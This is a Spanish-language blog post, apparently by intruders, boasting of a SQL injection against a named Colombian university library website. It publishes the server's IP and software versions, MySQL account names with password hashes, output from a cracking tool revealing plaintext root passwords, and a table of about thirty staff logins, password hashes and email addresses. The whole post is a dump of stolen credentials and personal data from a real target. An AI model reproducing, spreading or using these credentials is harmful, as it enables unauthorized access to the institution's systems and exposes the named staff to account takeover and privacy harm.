Un cliente nos pidio entrar a esta Universidad y analizandola vimos muchas vulnerabilidades y decidimos publicar esta Inyeccion Sql (la mas facil xD). estos son los datos:
Target: http://bibliotecologia.udea.edu.co/
Host IP: 200.24.17.77
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Resp. Time(avg): 551 ms
Current User: root@localhost
Sql Version: 5.0.22
Current DB: bibliotecologia
System User: root@localhost
DB User & Pass:
root:51a71aa84f5e79ad:localhost
root:51a71aa84f5e79ad:bibliotecologia.udea.edu.co
sihv:7ee747b1438fab32:localhost
carolina:061dd24f073615f5:localhost
tarjetas:360af43f5cd1aa99:localhost
parquee:51a71aa84f5e79ad:localhost
parquee:51a71aa84f5e79ad:127.0.0.1
ojs:0dba41335d89e2ec:localhost
agenda:2636eaa3272a5014:localhost
Data Bases:
information_schema
GUIE
agenda
bibliotecologia
bibliotecologia3
mysql
ojs
sihv
test
Crackeando los password Mysql Nos dio esto:
root@bt:~# ./poc 51a71aa84f5e79ad
mysql crack POC (c) 2006 Philippe Vigier & www.sqlhack.com
password for footprint 51a71aa84f5e79ad = 'qazwsx'
root@bt:~# ./poc 7ee747b1438fab32
mysql crack POC (c) 2006 Philippe Vigier & www.sqlhack.com
password for footprint 7ee747b1438fab32 = 'qwe123'
Algunos datos mas....
| cal_login | cal_passwd | cal_email |
| abetancur | daab467adbeee3ee6cbe5db61831a315 | abetancur@bibliotecologia.udea.edu.co |
| admejia | dbc69cd0af5426aa2fad2d5d41c7e117 | admejia@bibliotecologia.udea.edu.co |
| admin | c4ca4238a0b923820dcc509a6f75849b | |
| bcadavid | c19e4d6eff55f8853ea9cc3f86abc301 | bcadavid@bibliotecologia.udea.edu.co |
| cbetancur | 7f578f5ee6f207f4a910e5c3a980226b | cbetancur@bibliotecologia.udea.edu.co |
| claudiao | 335bcaceb7b9bbaf2e0423ce694e4a29 | claudiao@bibliotecologia.udea.edu.co |
| Comunicaciones | b12f42ceac8213befef98a2ebbb0a87c | comunicaciones@bibliotecologia.udea.edu.co |
| daniel | aa47f8215c6f30a0dcdb2a36a9f4168e | daniel@bibliotecologia.udea.edu.co |
| dial | 6de514dbc026d5badb01f8ea18ffcc9b | dial@bibliotecologia.udea.edu.co |
| diana.echeverri | 0e7c386f3c7db721bc9c93eb7c2338e0 | diana.echeverri@bibliotecologia.udea.edu.co |
| eibgegz | 0bc127694a6929022c1d5f5efd61141a | eibgegz@bibliotecologia.udea.edu.co |
| elizabet | e8847133c4152d265693f33033736cb0 | elizabet@bibliotecologia.udea.edu.co |
| fabustamante | e3b5bd948ac7798751471b11b5ae7d12 | fabustamante@bibliotecologia.udea.edu.c |
| hernanmv | 53a3e323b8dfedbf150ef04ee374bfeb | hernanmv@bibliotecologia.udea.edu.co |
| jaime.gomez | ba360e4b621ab96bdb3500a094dc36c3 | jaime.gomez@bibliotecologia.udea.edu.co |
| jbornacelly | 9381900dfa5945f2a1c57b4b80ebcccc | jbornacelly@bibliotecologia.udea.edu.co |
| jcochoa | 907a255921a69d7898a4f6fcf28ac7b5 | jcochoa@bibliotecologia.udea.edu.co |
| marbel | b03541011ec99ec90ab7e7a0d5c19c1f | marbel@bibliotecologia.udea.edu.co |
| mbetancur | 46171ef5d6dda95ca1c1fba8291f98c1 | mbetancur@bibliotecologia.udea.edu.co |
| mgaviria | 4bfcefecf914a54ff600efb00dcef807 | mgaviria@bibliotecologia.udea.edu.co |
| mlgiraldo | b8697f708af8047255f256a2759de2f0 | mlgiraldo@bibliotecologia.udea.edu.co |
| mmuner | a87600dbe4279c72f1df37d9d2377d7c | mmuner@bibliotecologia.udea.edu.co |
| monica | ff0d813dd5d2f64dd372c6c4b6aed086 | monica@bibliotecologia.udea.edu.co |
| msmoli | 944dd8f6b75d20e742212fd82c8697b7 | msmoli@bibliotecologia.udea.edu.co |
| nathalia | 584d172c5b231607bf38cf01eceb550a | nathalia@bibliotecologia.udea.edu.co |
| ojara | 7e131fe50d87b36342295d86659e0244 | ojara@bibliotecologia.udea.edu.co |
| secretaria.cicinf | 336073332c3559c83ac7d6949860d91e | secretaria.cicinf@bibliotecologia.udea.edu.co |
| soporte | 6601df608c8f036743420420ceff62fc | soporte@bibliotecologia.udea.edu.co |
| wilson.castano | 1e5f32238c3f594982e6c8faa689d125 | wilson.castano@bibliotecologia.udea.edu.co |
0 comentarios:
Publicar un comentario